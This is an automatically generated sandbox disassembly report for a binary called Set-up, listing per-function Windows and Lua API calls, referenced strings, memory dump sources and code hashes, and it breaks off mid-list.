                                                                                          • Instruction Fuzzy Hash: 3A71CE31604244EFCB24EFA4DD48BAEBBB9FF85314F114469F85697261CB31AD01CB21
                                                                                          APIs
                                                                                          • strstr.VCRUNTIME140 ref: 00BDC707
                                                                                          • luaL_prepbuffsize.SET-UP(?,00000000), ref: 00BDC724
                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000,?,00000000), ref: 00BDC72C
                                                                                          • luaL_prepbuffsize.SET-UP(?,?), ref: 00BDC752
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?), ref: 00BDC75A
                                                                                          • strstr.VCRUNTIME140 ref: 00BDC771
                                                                                          • luaL_prepbuffsize.SET-UP(?,?), ref: 00BDC798
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?), ref: 00BDC7A0
                                                                                          • luaL_pushresult.SET-UP(?), ref: 00BDC7B1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_prepbuffsizememcpy$strstr$L_pushresult
                                                                                          • String ID:
                                                                                          • API String ID: 627481426-0
                                                                                          • Opcode ID: f93702303921785c0ad47b92b0ec09c3795fa203752234871dd456604f19b5e1
                                                                                          • Instruction ID: f976e26ef0bec98bc00c946c01b0133c4fd5bbca41a019fd10b761dbcbfe6fc0
                                                                                          • Opcode Fuzzy Hash: f93702303921785c0ad47b92b0ec09c3795fa203752234871dd456604f19b5e1
                                                                                          • Instruction Fuzzy Hash: F141C8759043459BC720DF28C88596FBBE8EF85364F040AAEF99997341EB31D904CBA2
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140 ref: 00A6D089
                                                                                          • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00A6D099
                                                                                          • GetUpdateRgn.USER32(?,00000000,00000000), ref: 00A6D0AE
                                                                                          • BeginPaint.USER32(?,?), ref: 00A6D0BF
                                                                                            • Part of subcall function 00A6CA40: CreateRectRgnIndirect.GDI32(?), ref: 00A6CB18
                                                                                            • Part of subcall function 00A6CA40: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00A6CB2F
                                                                                            • Part of subcall function 00A6CA40: CombineRgn.GDI32(00000000,00000000,?,00000004), ref: 00A6CB48
                                                                                          • DeleteObject.GDI32(?), ref: 00A6D199
                                                                                          • EndPaint.USER32(?,?), ref: 00A6D1B4
                                                                                          • GetDC.USER32(?), ref: 00A6D1E3
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00A6D1FA
                                                                                          • ValidateRect.USER32(?,00000000), ref: 00A6D208
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Rect$Create$Paint$BeginCombineDeleteIndirectObjectReleaseUpdateValidatememset
                                                                                          • String ID:
                                                                                          • API String ID: 4135010277-0
                                                                                          • Opcode ID: cb26efcee7b15245e2fd90ffe1aedaccacd3b704d979ca0e9c6846884b5e016a
                                                                                          • Instruction ID: 78a46c2e22c0c0410dcc9d84388cb8f8ffcc4ad56e67e8186f9eaf4e2f6b42a4
                                                                                          • Opcode Fuzzy Hash: cb26efcee7b15245e2fd90ffe1aedaccacd3b704d979ca0e9c6846884b5e016a
                                                                                          • Instruction Fuzzy Hash: 5A513470704742AFD358DF28C949B6AFBE4FF89305F04421AF99997290DB71A861CF92
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75296BA0), ref: 00A6B83A
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,75296BA0,00A632E3), ref: 00A6B85D
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75296BA0), ref: 00A6B8D2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                          • String ID: gfff$gfff$gfff$gfff
                                                                                          • API String ID: 2665656946-2178600047
                                                                                          • Opcode ID: 9b53dbbf04ce1923fe026bd4dac8c946636688723daa651aeea12d4528f4c874
                                                                                          • Instruction ID: 9170a017c78fcab7988272195c8c08f2752f1b85505c6ef72346a79bb52e27fa
                                                                                          • Opcode Fuzzy Hash: 9b53dbbf04ce1923fe026bd4dac8c946636688723daa651aeea12d4528f4c874
                                                                                          • Instruction Fuzzy Hash: E251A5B2A101099FCB18DF2DD995A6DB7B5EFC43407188269E80ACF345EB31EA45CB91
                                                                                          APIs
                                                                                            • Part of subcall function 00BDA2A0: lua_getinfo.SET-UP(?,00C5F5BC,?,?,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA2BE
                                                                                            • Part of subcall function 00BDA2A0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,_G.,00000003,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA34D
                                                                                            • Part of subcall function 00BDA2A0: lua_pushstring.SET-UP(?,?,?,?,?,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA35F
                                                                                            • Part of subcall function 00BDA2A0: lua_copy.SET-UP(?,000000FF,00BDA8E5,?,?,?,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA3A4
                                                                                          • lua_pushfstring.SET-UP(?,function '%s',?,?,?,?,00BDA74B), ref: 00BDA431
                                                                                          • lua_pushfstring.SET-UP(?,%s '%s',?,?,?,?,?,00BDA74B), ref: 00BDA489
                                                                                          • lua_pushfstring.SET-UP(?,function <%s:%d>,?,?,?,?,?,00BDA74B), ref: 00BDA4E1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: lua_pushfstring$lua_copylua_getinfolua_pushstringstrncmp
                                                                                          • String ID: %s '%s'$function '%s'$function <%s:%d>$main chunk
                                                                                          • API String ID: 2618532401-2881968887
                                                                                          • Opcode ID: 9d95c69cb3a9455800dd0b09812f0ccf0033565382272fdb5b54f9974103913a
                                                                                          • Instruction ID: 4eaa217bc22bbf9f22606e41469863c683062bdf803908d80be3cfed3e8998a4
                                                                                          • Opcode Fuzzy Hash: 9d95c69cb3a9455800dd0b09812f0ccf0033565382272fdb5b54f9974103913a
                                                                                          • Instruction Fuzzy Hash: D44136717006405BDB249E299C85926F3D1EF80325B18C6BEE81A8B397FB70EC158B91
                                                                                          APIs
                                                                                          • luaL_setfuncs.SET-UP(?,00C389F0,00000000), ref: 00BF701E
                                                                                          • lua_setmetatable.SET-UP(?,000000FE), ref: 00BF70BB
                                                                                          • luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BF7122
                                                                                          • luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BF7139
                                                                                          Strings
                                                                                          • version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BF7133
                                                                                          • __index, xrefs: 00BF70D6
                                                                                          • multiple Lua VMs detected, xrefs: 00BF711C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_error$L_setfuncslua_setmetatable
                                                                                          • String ID: __index$multiple Lua VMs detected$version mismatch: app. needs %f, Lua core provides %f
                                                                                          • API String ID: 3827939816-3105074172
                                                                                          • Opcode ID: 5a11e9442cbc3d0f2943a729e7dcf0d96691d0340973d99088b7287a68865b34
                                                                                          • Instruction ID: 6a5616539d358b6bc8aff6a5b9be268230524fc0ffeb4223ea97b808c7c2e8a6
                                                                                          • Opcode Fuzzy Hash: 5a11e9442cbc3d0f2943a729e7dcf0d96691d0340973d99088b7287a68865b34
                                                                                          • Instruction Fuzzy Hash: 4641A0706046099BC714AF28C845A39F7E2FF84324F14C69DE8698B7D2EB75A815CF81
                                                                                          APIs
                                                                                          • lua_getinfo.SET-UP(?,00C5F5BC,?,?,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA2BE
                                                                                            • Part of subcall function 00BE22B0: strchr.VCRUNTIME140 ref: 00BE2315
                                                                                            • Part of subcall function 00BE22B0: strchr.VCRUNTIME140 ref: 00BE235B
                                                                                            • Part of subcall function 00BDA0F0: lua_next.SET-UP(?,000000FE,?,?,?,?), ref: 00BDA13A
                                                                                            • Part of subcall function 00BDA0F0: lua_type.SET-UP(?,000000FE), ref: 00BDA149
                                                                                            • Part of subcall function 00BDA0F0: lua_next.SET-UP(?,000000FE), ref: 00BDA1A7
                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,_G.,00000003,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA34D
                                                                                          • lua_pushstring.SET-UP(?,?,?,?,?,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA35F
                                                                                          • lua_copy.SET-UP(?,000000FF,00BDA8E5,?,?,?,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA3A4
                                                                                          • lua_settop.SET-UP(?,?,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA3BE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: lua_nextstrchr$lua_copylua_getinfolua_pushstringlua_settoplua_typestrncmp
                                                                                          • String ID: _G.$_LOADED
                                                                                          • API String ID: 429446339-344459542
                                                                                          • Opcode ID: 689d0ab14cc4bd6b62b18fa9eb553790a354e419e60c6085dc609eefb0968b22
                                                                                          • Instruction ID: f05c07df4bfbeccb47a3992dc9035a3a8056f8f2677f48eaafdcb5d4df69f937
                                                                                          • Opcode Fuzzy Hash: 689d0ab14cc4bd6b62b18fa9eb553790a354e419e60c6085dc609eefb0968b22
                                                                                          • Instruction Fuzzy Hash: EA31DB76B006041BD710AA799C8692BF3D6DB81331B5442B9FC1A973C7FE61DD058792
                                                                                          APIs
                                                                                          • roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A65782
                                                                                          • roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A65792
                                                                                          • roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A6580C
                                                                                          • roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A6581C
                                                                                          • roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A658BA
                                                                                          • roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A658CA
                                                                                          • roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A6595A
                                                                                          • roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A6596A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: roundf
                                                                                          • String ID:
                                                                                          • API String ID: 1470247359-0
                                                                                          • Opcode ID: 0b460f80ac23a0aabae897e35ff4c97331c192ed5a68a7a36a6fb8a82d84fe4f
                                                                                          • Instruction ID: 8f67f04deb027c4fb59345f50c774aef2f4baf5cc1698d219331b9f73f402709
                                                                                          • Opcode Fuzzy Hash: 0b460f80ac23a0aabae897e35ff4c97331c192ed5a68a7a36a6fb8a82d84fe4f
                                                                                          • Instruction Fuzzy Hash: 3691BF70609345DFC7009F64E58896ABBF0FF88B04F518959F9D5A2268E731D834CF96
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$DeleteSelect
                                                                                          • String ID:
                                                                                          • API String ID: 618127014-0
                                                                                          • Opcode ID: 2de133c2d5887fdc47a88580d9891c62a1ee82773a4d1ceb495f798df23142d3
                                                                                          • Instruction ID: b2d37dd706f15528a63b14df1607c21f55a2c6799216898ecd0a821a3ca686c8
                                                                                          • Opcode Fuzzy Hash: 2de133c2d5887fdc47a88580d9891c62a1ee82773a4d1ceb495f798df23142d3
                                                                                          • Instruction Fuzzy Hash: F2116D70104B019BE7319F26CD48B17FBF9AF48314F054A1DE89A92AA0D775E859DF60
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Focus
                                                                                          • String ID:
                                                                                          • API String ID: 2734777837-0
                                                                                          • Opcode ID: aee877884ea6378d5ff3951dabaf2dd8a90dbf820dda3e4dcb4519fd321efb93
                                                                                          • Instruction ID: 6dfdb87ddeabae230ce12b35eeb3bbf259dd8099107f2bca58d5d7452a64aa97
                                                                                          • Opcode Fuzzy Hash: aee877884ea6378d5ff3951dabaf2dd8a90dbf820dda3e4dcb4519fd321efb93
                                                                                          • Instruction Fuzzy Hash: 6B91AF312083019FCB24EF28E956B7EB7F5EB98714F10453EF94A9B291DB70A804C796
                                                                                          APIs
                                                                                          • GlobalLock.KERNEL32(?), ref: 00A7395A
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 00A739BC
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 00A739D2
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A73A05
                                                                                          • ScreenToClient.USER32(?,?), ref: 00A73A7E
                                                                                          • ReleaseStgMedium.OLE32(?), ref: 00A73ADD
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,00000000,?,?,?), ref: 00A73B09
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Global$ClientLockMediumReleaseScreenUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 4130750421-0
                                                                                          • Opcode ID: 2a1da7747d85f2ea2b3bc8bda6c7f6ab360a0cffab079c0551a48300b6b420b1
                                                                                          • Instruction ID: f722ef4258fecc4008ba0a4344799eebdd3d2c11881d89300612f0884044458f
                                                                                          • Opcode Fuzzy Hash: 2a1da7747d85f2ea2b3bc8bda6c7f6ab360a0cffab079c0551a48300b6b420b1
                                                                                          • Instruction Fuzzy Hash: 28919C72E002099BDF14DFA8CC45BAEBBB5FF48310F10C169E929AB291DB359A41CF50
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 00A74CE5
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?), ref: 00A74D06
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000,?,?,?,?), ref: 00A74D7C
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 00A74DA8
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?), ref: 00A74DBF
                                                                                            • Part of subcall function 00A624A0: ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(vector<T> too long,00A62490), ref: 00A624A5
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 00A74DD9
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?), ref: 00A74DF9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$Xlength_error@std@@_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 648083828-0
                                                                                          • Opcode ID: acb4fcb9625d0287aef2e0360e3b795172125e6d3119590fe1b3dfbd20cb0dec
                                                                                          • Instruction ID: 9e127057468ab46f3dcdeaa2d832fef5e03a21cab02b4d6719b5082ed8a1d47c
                                                                                          • Opcode Fuzzy Hash: acb4fcb9625d0287aef2e0360e3b795172125e6d3119590fe1b3dfbd20cb0dec
                                                                                          • Instruction Fuzzy Hash: AE61C2B2900515AFCB15DF7CCD859BEB7A8AF08310B14C769F929D7691EB30A914C790
                                                                                          APIs
                                                                                          • luaL_setfuncs.SET-UP(?,00C38B6C,00000000), ref: 00BFAAFD
                                                                                          • luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BFAB66
                                                                                          • luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BFAB7D
                                                                                          Strings
                                                                                          • version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BFAB77
                                                                                          • multiple Lua VMs detected, xrefs: 00BFAB60
                                                                                          • charpattern, xrefs: 00BFAB39
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
